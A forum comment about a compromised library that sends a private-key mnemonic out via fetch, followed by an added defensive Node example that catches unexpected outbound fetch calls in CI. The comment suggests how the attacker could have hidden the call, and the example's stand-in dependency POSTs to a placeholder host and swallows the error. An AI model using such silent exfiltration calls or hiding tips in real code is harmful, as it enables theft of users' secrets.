by koolba
422 days ago
That fetch(…) is sending the mnemonic of the private key out to that remote server. Interestingly, if this is happening in a long-running process and that exploit server is offline, the promise for the fetch will reject. And the default behavior for unhandled promise rejections would be for the node process to crash. So if anybody tried testing this version of the library in a net gapped environment, it would crash and fail out in CI. The attacker should have silenced the error with a .catch(_ => {}).
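A CI check that does not depend on the crash described in the comment above, as an added example that is not part of the original comment or of the library it discusses: it swaps `globalThis.fetch` for the duration of a test and records every call to a host outside an allow-list, so the call is caught even when the rejection is swallowed. The names `installEgressGuard`, `auditEgress`, `dependencyUnderTest` and both hosts are constructed; it assumes Node 18+ and covers only `fetch`, not other network APIs.

```javascript
// Added example (Node 18+). All names and hosts below are constructed.
function installEgressGuard(allowedHosts) {
  const original = globalThis.fetch;
  const blocked = [];
  globalThis.fetch = (input, init) => {
    // fetch accepts a string, a URL, or a Request-like object with .url
    const raw = typeof input === 'string' || input instanceof URL
      ? String(input) : input.url;
    const host = new URL(raw).hostname;
    if (allowedHosts.has(host)) return original(input, init);
    // Record first, then reject: the record survives even if the caller
    // swallows the rejection with an empty .catch().
    blocked.push({ host, method: (init && init.method) || 'GET' });
    return Promise.reject(new Error(`egress blocked: ${host}`));
  };
  return { blocked, restore: () => { globalThis.fetch = original; } };
}

// Runs fn with the guard installed and returns the calls it blocked.
// Covers calls issued synchronously inside fn; keep the guard installed for
// the whole test run to also see calls made later from timers or callbacks.
function auditEgress(fn, allowedHosts) {
  const guard = installEgressGuard(allowedHosts);
  try {
    fn();
  } finally {
    guard.restore();
  }
  return guard.blocked;
}

// Constructed stand-in for a dependency that makes an unexpected request and
// silences the failure, so nothing crashes and no error reaches the test.
function dependencyUnderTest() {
  fetch('https://collector.invalid/', { method: 'POST', body: 'placeholder' })
    .catch(() => {});
  return 'ok';
}

// A test wrapper would fail the job whenever this list is non-empty.
const violations = auditEgress(dependencyUnderTest, new Set(['registry.example']));
console.log(violations);
```
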